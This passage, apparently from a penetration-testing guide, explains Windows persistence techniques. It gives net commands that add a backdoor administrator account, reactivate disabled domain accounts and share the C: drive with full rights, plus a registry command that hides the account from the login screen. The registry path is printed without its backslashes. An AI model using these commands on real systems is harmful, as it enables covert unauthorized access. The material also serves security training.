The following commands are highly invasive and are usually detected by the system owner during the incident response process. However, they are frequently planted by an attacker to draw attention away from more persistent access mechanisms. Refer to the following table:
Command |
Description |
net user attacker password /add net user testuser testpassword /ADD /DOMAIN |
Creates a new local account with a user called attacker and a password set to password. It also adds the same user to the domain if you are running the command on a domain controller. |
net localgroup administrators attacker /add |
Adds a new user called attacker to the local administrator's group. In some cases, the command will be net localgroup administrators /add attacker. |
net user username /active:yes /domain |
Changes an inactive or disabled account to active. In a small organization, this will attract attention. Large enterprises with poor password management can have 30% of their passwords flagged as inactive, so it may be an effective way to gain an account. |
net share name$=C: /grant:attacker,FULL /unlimited |
Shares C: (or another specified drive) as a Windows share, and grants the user (attacker) full rights to access or modify all of the content on that drive. |
If you create a new user account, it will be noticed when anyone logs onto the welcome screen of the compromised system. To make the account invisible, you need to modify the registry from the command line using the following REG command:
REG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinLogonSpecialAccountsUserList /V account_name /T REG_DWORD /D 0
This will modify the designated registry key to hide the account of the user (/V). Again, there may be special syntax requirements based on the specific version of the target's operating system, so determine the Windows version first and then validate it in a controlled test environment before implementing it against the target.